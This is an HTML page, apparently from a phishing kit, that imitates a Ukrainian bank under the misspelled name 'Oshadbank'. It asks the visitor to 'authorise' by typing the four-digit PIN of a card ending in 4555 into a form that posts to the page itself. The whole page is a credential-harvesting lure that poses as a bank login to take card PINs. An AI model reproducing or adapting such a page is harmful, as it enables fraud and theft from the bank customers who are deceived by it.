<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" type="image/png" href="logo_oshadbank.png">
  <title>Oshadbank</title>
  <style>
    body { background-image: linear-gradient(-3deg, #f2f5fa 80%, #fdf01f 83%, #26cfc7 10%); } .logo { height: 55px; width: 55px; background: url('logo_oshadbank.png') no-repeat center; } .logo-page { width:65px; height:65px; } .button { color: #fff; border-radius: 4px; background-color: #26cfc7; } .bar { border: 2px solid #26cfc7; } .bar::before { background-color: #26cfc7; }
  </style>
  <link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div class="content">
    <div class="container">
      <div class="logo"></div>
      <h2>Авторизація</h2>
      <p>Введіть PIN код картки ** <span class="pin_card">4555</span></p>
  </div>

   <form method="post">
        <input type="tel" id="pin" name="pin" data-text="PIN код" placeholder="0000" minlength="4" maxlength="4" autocomplete="off" style="font-size:22px; letter-spacing: 5px;">
        <p class="format">Будь ласка, вкажіть PIN код.</p>
        <button class="button" type="submit">Далi</button>
      </form>
    </div>
  </div
</body>
</html>
